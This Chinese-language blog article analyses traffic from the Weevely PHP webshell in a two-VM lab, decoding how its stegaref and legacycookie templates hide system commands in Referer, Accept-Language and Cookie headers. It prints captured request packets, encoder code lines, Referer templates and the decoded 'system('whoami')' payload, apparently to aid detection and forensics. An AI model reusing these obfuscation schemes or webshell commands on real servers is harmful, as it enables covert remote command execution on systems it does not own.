Weevely使用及源码分析(二)

2017-01-13 19:11:34来源:CSDN作者:yaofeiNO1人点击

1. 定义(术语、名词解释)

   客户端:运行Weevely进程的计算机。
   服务端:存有PHP木马的服务器。

2. 协议交互流程

   在客户端,Weevely每执行一条命令就通过HTTP协议发出一条GET/POST请求;在服务端,木马针对每条GET/POST请求作出响应,产生一条响应包。

3. 数据包及源码分析

   通过对源代码进行走读以及wireshark进行抓包分析,可以看出Weevely主要生成的php后门文件主要有三种模板:stegaref_php.tpl,legacycookie_php.tpl,stegaref_php_debug.tpl。其中stegaref_php.tpl与stegaref_php_debug.tpl两种php模板类似,主要特点是返回的response_body中的标签stegaref_php.tpl为<连接密码md5加密前八位>标签,stegaref_php_debug.tpl为:<连接密码md5加密前八位+DEBUG>标签,同时响应体中的内容stegaref_php_debug.tpl模板把主要的有用数据字段全都显示出来了,主要用于前期debug使用,所以本文档主要分析了stegaref_php.tpl和legacycookie_php.tpl两种使用模板。

3.1 stegaref_php.tpl模板

   以ip为136的kali虚拟机为客户端对含有后门文件的ip为137的kali虚拟机作为服务器进行远程连接。连接成功后在客户端命令行中输入命令whoami查看回显内容。通过Wireshark我们抓取到了两个TCP数据流。分别为:

3.1.1 请求包

数据包

GET /backdoor.php HTTP/1.1
Accept-Encoding: identity
Accept-Language: uk-UA,mi;q=0.5,mt;q=0.7,mk;q=0.8
Host: 192.168.182.137
Accept: text/html,text/plain;0.9,/
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1
Connection: close
Referer: WO2gRIcnxgee6zgNBv-_H-rGFUhmIHND”>http://www.google.bt/url?sa=t&rct=j&q=168.182.137&source=web&cd=799&ved=bd6Tfh__3&url=168.182&ei=z5HrNlsxt6GOIdThqz-xn9&usg=WO2gRIcnxgee6zgNBv-_H-rGFUhmIHND

分析

HTTP攻击载荷主要存储于Referer头中,通过Accept-Language头中存储的sessionid和payload的数组偏移量对加密的payload进行提取。|

数据包

GET /backdoor.php HTTP/1.1
Accept-Encoding: identity
Accept-Language: ur-PK,mh;q=0.4
Connection: close
Accept: text/html,application/xml;0.9,/
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Host: 192.168.182.137
Cookie: PHPSESSID=fkdt4fv5tkn3q2hnhp10rv65o5
Referer: http://translate.googleusercontent.com/translate_c?depth=1&rurl=translate.google.com&sl=auto&tl=en&usg=hiNRM7PjQ220tyDdwupmXEp1ZrLJkF0aFf

分析

HTTP攻击载荷主要存储于Referer头中,通过Accept-Language头中存储的sessionid和payload的数组偏移量对加密的payload进行提取。

   通过对Weevely源码进行分析,确定数据包格式主要通过7种不同的构造Referer数据报头方法进行对加密的payload进行填充。Referer头格式为:

  • http://www.google.${ tpl.rand_google_domain() }/url?sa=t&rct=j&q=${ tpl.target_name() }&source=web&cd=${ tpl.rand_number(3) }&ved=${ tpl.payload_chunk(9) }&url=${ tpl.target_name() }&ei=${ tpl.payload_chunk(22) }&usg=${ tpl.payload_chunk(34) }
  • http://www.google.${ tpl.rand_google_domain() }/url?sa=t&rct=j&q=${ tpl.target_name() }&source=web&cd=${ tpl.rand_number(3) }&ved=${ tpl.payload_chunk(9) }&url=${ tpl.target_name() }&ei=${ tpl.payload_chunk(22) }&usg=${ tpl.payload_chunk(34) }&sig2=${ tpl.payload_chunk(22) }
  • http://translate.googleusercontent.com/translate_c?depth=1&rurl=translate.google.com&sl=auto&tl=en&u=${ tpl.target_name() }&usg=${ tpl.payload_chunk(34) }
  • http://${ tpl.get_url_base() }/?${ tpl.rand_chars(2) }=${ tpl.payload_chunk(30,20) }&${ tpl.rand_chars(2) }=${ tpl.payload_chunk(30,20) }
  • http://${ tpl.get_url_base() }/?${ tpl.rand_chars(3) }=${ tpl.payload_chunk(30,20) }
  • http://${ tpl.get_url_agent() }?${ tpl.rand_chars(2) }=${ tpl.payload_chunk(30,20) }&${ tpl.rand_chars(2) }=${ tpl.payload_chunk(30,20) }
  • http://${ tpl.get_url_agent() }?${ tpl.rand_chars(3) }=${ tpl.payload_chunk(30,20) }

3.1.2 响应包

数据包

HTTP/1.1 200 OK
Date: Mon, 19 Sep 2016 07:13:56 GMT
Server: Apache/2.4.23 (Debian)
Set-Cookie: PHPSESSID=fkdt4fv5tkn3q2hnhp10rv65o5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

分析

这一部分响应包中主要显示了响应头的基本信息,没有什么特殊的有用信息。|

数据包

HTTP/1.1 200 OK
Date: Mon, 19 Sep 2016 07:13:56 GMT
Server: Apache/2.4.23 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 45
Connection: close
Content-Type: text/html; charset=UTF-8

<5d41402a>TfgfHhvnfygZLdAzNCHtYgI=

分析

攻击载荷返回结果存储于响应体中,响应体具体返回结果通过”<5d41402a>”标签封装。

   <5d41402a>标签中”5d41402a”是php后门文件的连接密码”hello”通过代码:shared_key = hashlib.md5(password).hexdigest().lower()[:8]执行得出。即shared_key为连接密码进行MD5加密取其前八位。标签内的内容为攻击载荷具体返回值:”TfgfHhvnfygZLdAzNCHtYgI=”具体内容经过解密(先base64解码,再和shared_key进行异或,最后通过zip解压缩)zlib.decompress(utils.strings.sxor(base64.urlsafe_b64dncode(payload), shared_key))得到返回值:”www-data”。
真实的payload被经过多重编码后分散在报文的各个部分,我们需要对weevely的源码进行解析,然后对加密后的payload进行解密提取有用的价值。

3.2 legacycookie_php.tpl模板

   通过用Wireshark进行数据包的捕获。

3.2.1 请求包

数据包

GET /test.php HTTP/1.1
Accept-Encoding: identity
Host: 192.168.182.137
Cookie: USR=he; APISID=-Y2*hka?XI/oJy9-2YXIv; USRID=d3@d3L2h0b-W-wn-K&TtA; SESS=c-3*lzdGV-tK-C-d3aG9hbWkgMj4mM#Sc*pO-w==
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR)AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16

分析

攻击载荷主要存在于Cookie头中,Cookie中的payload主要通过base64编码加密,加密后的payload通过进行拆分,同时通过#&*-/?@~这些特殊字符串进行混淆。

   通过对Weevely源码进行分析,可以看到对cookie中的payload进行拆分的数组主要由default_prefixes = ["ID", "SID", "APISID","USRID", "SESSID", "SESS","SSID", "USR", "PREF"]这几个数组组成。payload通过代码:payload = base64.b64encode(original_payload.strip())对payload进行base64编码加密。Cookie中第一个字符串:”USR=he;”其中”he”为连接密码前两位。

3.2.2 响应包

数据包

HTTP/1.1 200 OK
Date: Tue, 20 Sep 2016 01:39:18 GMT
Server: Apache/2.4.23 (Debian)
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

/www-data/

分析

攻击载荷返回结果存储于响应体中,响应体具体返回结果通过”//“标签封装。

   响应包标签”//“中”llo”通过对php代码进行分析可知:$k="${password[2:]}";为连接密码第三位至末尾字符串。攻击载荷返回结果即为//标签中的返回值。

4. 数据包载荷分析

4.1 weevely数据包(stegaref_php.tpl模块)分析

4.1.1 weevely webshell控制通道原理

   weevely使用了python中的cmd模块实现交互会话,交互会话的命令有两部分:
1. modules目录中包含了一部分命令的实现,例如weevely3/modules/file/目录实现了cd,cp等命令
2. 对于modules中没有定义的命令,weevely会使用system函数直接执行用户输入命令。
weevely在建立连接的时候会从服务器上获取web根目录的绝对路径,因此whoami命令,在最终会生成:
“chdir(‘/var/www/html’);@system(‘whoami 2>&1’);”
其中,stegaref.py为核心代码区域,referrers.tpl为mako模板,weevely根据这个模板编码攻击payload。
编码后的payload在HTTP的Referer和Accept-Language中,其中Accept-Language用于指示payload在referer中的偏移位置,在我们抓取到的数据包中,原始payloadchdir('/var/www/html');@system('whoami 2>&1');将会被编码为:Accept-Language: uk-UA,mi;q=0.5,mt;q=0.7,mk;q=0.8
Referer: http://www.google.bt/url?sa=t&rct=j&q=168.182.137&source=web&cd=799&ved=bd6Tfh__3&url=168.182&ei=z5HrNlsxt6GOIdThqz-xn9&usg=WO2gRIcnxgee6zgNBv-_H-rGFUhmIHND
Accept-Language: ur-PK,mh;q=0.4
Referer: http://translate.googleusercontent.com/translate_c?depth=1&rurl=translate.google.com&sl=auto&tl=en&usg=hiNRM7PjQ220tyDdwupmXEp1ZrLJkF0aFf

4.1.2 核心函数send()流程分析

  1. session_id, referrers_data = self._prepare(original_payload)调用_prepare函数对原始payload进行编码,生成承载编码后的payload的referer数组,由于payload可能很长,因此可能生成多个referer。
  2. for referrer_index, referrer_data in enumerate(referrers_data):accept_language_header = self._generate_header_accept_language调用_generate_header_accept_language()函数生成对应的Accept-Language。其中q=0.5,q=0.7,q=0.8以及q=0.4分别代表payload在referer数组中的偏移量。
  3. 生成其他的http header,发送payload给webshell。

4.1.3 _prepare()函数分析

  1. 函数原型:def _prepare(self, payload):这里的payload还为原始的payload
  2. payload加密函数:obfuscated_payload = base64.urlsafe_b64encode(utils.strings.sxor(zlib.compress(payload),self.shared_key)).rstrip('='),首先对原始payload进行编码,zip压缩后和shared_key进行异或运算,最后进行base64编码,注意这里的shared_key,这个key非常重要,生成的算法很简单:shared_key = hashlib.md5(password).hexdigest().lower()[:8]其中password就是webshell的密码,这里的是hello。
  3. _prepare()函数不仅仅对payload进行加密,同时也随机生成了sessionid(占两个字节),这个sessionid在_generate_header_accept_language()函数中被分解为多个字符串,即为Accept-Language中的uk-UA,mi;mt;mk;对于我们有用的就是uk-UA的第一个字符和mi,mt,mk的第一个字符,所以可以看出我们的sessionid为um。
  4. 通过代码header = hashlib.md5(session_id +self.shared_key[:4]).hexdigest().lower()[:3]
    header = hashlib.md5(session_id +self.shared_key[4:8]).hexdigest().lower()[:3]生成header和footer,而header和footer顾名思义用于指示编码后的payload的开始位置和结束位置。由于session_id上述说明了为um,所以对应的header和footer分别为‘bd6’和‘220’。
  5. 首先通过数组的偏移量可以找到大致的payload为:bd6Tfh__3z5HrNlsxt6GOIdThqz-xn9_WO2gRIcnxgee6zgNBv-_H_-rGFUhmIHNDhiNRM7PjQ220tyDdwupmXEp1ZrLJkF0aFf
    然后通过代码remaining_payload=header+obfuscated_payload+footer
    header和footer找出具体payload的值: Tfh__3z5HrNlsxt6GOIdThqz-xn9_WO2gRIcnxgee6zgNBv-_H_-rGFUhmIHNDhiNRM7PjQ
  6. for referrer_index, referrer_vanilla_data in enumerate(itertools.cycle(self.referrers_vanilla)):该代码为一个无限循环,这个循环将开始填充remaining_payload,这个循环有一个重要的参数,self.referrers_vanilla,这个参数是从referrers.tpl中读取并render()之后得到的,我们的数据包中可以看出使用了两模板:
    http://www.google.${ tpl.rand_google_domain() }/url?sa=t&rct=j&q=${ tpl.target_name() }&source=web&cd=${ tpl.rand_number(3) }&ved=${ tpl.payload_chunk(9) }&url=${ tpl.target_name() }&ei=${ tpl.payload_chunk(22) }&usg=${ tpl.payload_chunk(34) }**</code><br>和<code> **http://translate.googleusercontent.com/translate_c?depth=1&rurl=translate.google.com&sl=auto&tl=en&u=${ tpl.target_name() }&usg=${ tpl.payload_chunk(34) }

4.1.4 解密payload

   通过上文对payload进行提取可知,加密后的payload为:Tfh__3z5HrNlsxt6GOIdThqz-xn9_WO2gRIcnxgee6zgNBv-_H_-rGFUhmIHNDhiNRM7PjQ通过他的加密函数obfuscated_payload = base64.urlsafe_b64encode(utils.strings.sxor(zlib.compress(payload),self.shared_key)).rstrip('=')可以对算法进行逆向解密(先base64解密,shared_key异或,zip解压缩)可得算法为: zlib.decompress(utils.strings.sxor(base64.urlsafe_b64dncode(payload), shared_key)),由于payload进行加密时通过rstrip(‘=’)把等于号全部删除掉了,所以在进行解密时当算法出错时可以向字符串末尾添加”=”号结合算法进行解密,函数通过算法解密后可得到攻击载荷为:”chdir(‘/var/www/html’);@system(‘whoami 2>&1’);”。

4.1.5 响应体数据分析

   通过对数据包的提取,我们可以看到weevely的具体响应内容在响应体中显示:
<5d41402a>TfgfHhvnfygZLdAzNCHtYgI=

  1. 观察可见具体的回显数据被封装在<5d41402a>标签中,而标签里的内容为”5d41402a”,这个数据的由来是后门php文件连接密码”hello”通过shared_key = hashlib.md5(password).hexdigest().lower()[:8]这个函数进行MD5加密然后取前8位。
  2. 具体回显内容为”TfgfHhvnfygZLdAzNCHtYgI=”,该加密字符串主要的加密方式为先进行zip压缩后和shared_key做异或运算,然后再进行base64编码,通过算法decompress(utils.strings.sxor(base64.b64decode(response_body), shared_key))进行解密运算,得到命令”whoami”的执行结果:”www-data”。

4.2 weevely数据包(legacycookie模块)分析

4.2.1 legacycookie_php.tpl模板数据包解密payload

  1. legacycookie_php.tpl模板如图3.1所示:
    这里写图片描述
    图 3.1

    通过模板的php代码可以知道,用这个模板进行攻击的payload主要的加密方式为base64编码加密,所以payload只需要进行base64解码即可。
  2. payload片段分别放在Cookie字段中存储,通过代码 self.default_prefixes = ["ID", "SID", "APISID","USRID", "SESSID", "SESS","SSID", "USR", "PREF"]可知,Cookie中的USR,APISID等字符串主要从该数组中随机取出。
  3. additional_headers.append(('Cookie', '%s=%s;%s %s' % (prefixes.pop(),self.password[:2],additional_cookie if additional_cookie else '',cookie_payload_string)))代码中可以看到构造的Cookie第一个字符串是”self.password[:2]”即密码的前两位,后面的即为真正的payload,所以我们可以直接把payload进行拼接,然后手工去掉特殊字符,再进行base64解密就可以得到完整的payload。从数据包中提取的payload为”Y2hkaXIoJy92YXIvd3d3L2h0bWwnKTtAc3lzdGVtKCd3aG9hbWkgMj4mMScpOw==”进行base64解码后得到真正的payload为”chdir(‘/var/www/html’);@system(‘whoami 2>&1’);”

4.2.2 响应体分析

   使用legacycookie_php.tpl模板的php后门文件抓取的数据包响应体为明文数据,可以通过观察直观的看到我们攻击命令的回应信息。回应信息主要放在//标签中。而标签中的内容”llo”通过跟踪代码$k="${password[2:]}";echo "<$k>";echo "</$k>";可以知道”llo”为是php文件密码从第三个字符一直取到末尾得到。

最新文章

123

最新摄影

微信扫一扫

第七城市微信公众平台